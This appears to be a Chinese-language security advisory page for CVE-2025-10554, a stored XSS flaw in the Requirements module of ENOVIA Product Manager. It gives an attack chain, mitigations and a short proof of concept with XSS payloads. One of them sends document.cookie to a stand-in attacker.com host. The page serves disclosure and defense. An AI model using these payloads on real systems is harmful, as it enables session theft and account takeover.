IPBUF安全漏洞报告
English
CVE-2025-10554 CVSS 8.7 高危

CVE-2025-10554 ENOVIA Product Manager存储型XSS漏洞

披露日期: 2025-11-24

漏洞信息

漏洞编号
CVE-2025-10554
漏洞类型
存储型XSS (Stored Cross-site Scripting)
CVSS评分
8.7 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
ENOVIA Product Manager (3DEXPERIENCE)

相关标签

CVE-2025-10554存储型XSSENOVIA3DEXPERIENCEProduct Manager跨站脚本高危漏洞企业PLM系统

漏洞概述

CVE-2025-10554是影响ENOVIA Product Manager中Requirements组件的存储型跨站脚本(XSS)漏洞。该漏洞存在于3DEXPERIENCE平台的R2023x至R2025x所有版本中。攻击者可以利用此漏洞在Requirements功能的用户输入字段中注入恶意JavaScript代码。由于是存储型XSS,恶意脚本会被永久保存在服务器端,所有访问包含该恶意内容的页面的用户都会受到攻击。攻击者可以窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或传播恶意软件。该漏洞需要低权限认证和用户交互才能利用,CVSS评分8.7,属于高危漏洞。攻击向量为网络形式,机密性和完整性影响均为高,但可用性无影响。

技术细节

该存储型XSS漏洞存在于ENOVIA Product Manager的Requirements功能模块中。攻击者通过在需求文档的特定字段(如需求名称、描述或元数据字段)中注入恶意JavaScript代码。由于应用程序未对用户输入进行充分的输入验证和输出编码,恶意脚本被存储在数据库中。当其他用户访问或查看这些包含恶意内容的需求时,浏览器会执行注入的脚本代码。攻击者可以利用此方式窃取受害者的认证令牌、session ID或其他敏感信息。由于ENOVIA是企业级PLM系统,泄露的数据可能包含知识产权和商业机密。漏洞的利用需要攻击者拥有平台账户(低权限即可),并诱使受害者访问恶意内容所在页面。

攻击链分析

STEP 1
步骤1
攻击者获取ENOVIA Product Manager平台账户(低权限即可)
STEP 2
步骤2
攻击者访问Requirements功能模块,创建或编辑需求记录
STEP 3
步骤3
在需求名称、描述或其他输入字段中注入恶意JavaScript代码
STEP 4
步骤4
恶意脚本被存储在数据库中,等待其他用户访问
STEP 5
步骤5
受害者(其他用户)访问包含恶意内容的需求页面
STEP 6
步骤6
受害者浏览器执行注入的恶意脚本,窃取Cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// CVE-2025-10554 PoC - Stored XSS in ENOVIA Product Manager Requirements // This PoC demonstrates the XSS payload injection in Requirements module // XSS Payload - can be injected in Requirements fields var xssPayload = '<script>alert("XSS")</script>'; var xssPayloadCookie = '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>'; // Attack Scenario: // 1. Attacker creates or edits a Requirement in ENOVIA Product Manager // 2. Inject XSS payload in requirement name/description field // 3. When other users view this requirement, the script executes // Example: Creating malicious requirement via API or UI // POST /ENOVIA/api/requirements // { // "name": "Requirement Name<script>alert(document.cookie)</script>", // "description": "Description with XSS payload", // "type": "requirement" // } // The injected script will execute when: // - Users browse the Requirements list // - Users open the affected requirement detail page // - Requirement data is displayed in reports or exports

影响范围

3DEXPERIENCE R2023x
3DEXPERIENCE R2024x
3DEXPERIENCE R2025x

防御指南

临时缓解措施
在官方补丁发布之前,可采取以下临时缓解措施:1) 限制低权限用户创建和编辑Requirements的权限;2) 启用输入过滤机制阻止<script>等危险标签;3) 部署WAF规则检测和拦截XSS攻击载荷;4) 提醒用户不要点击来源不明的需求链接;5) 定期检查数据库中是否存在可疑的恶意脚本内容。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表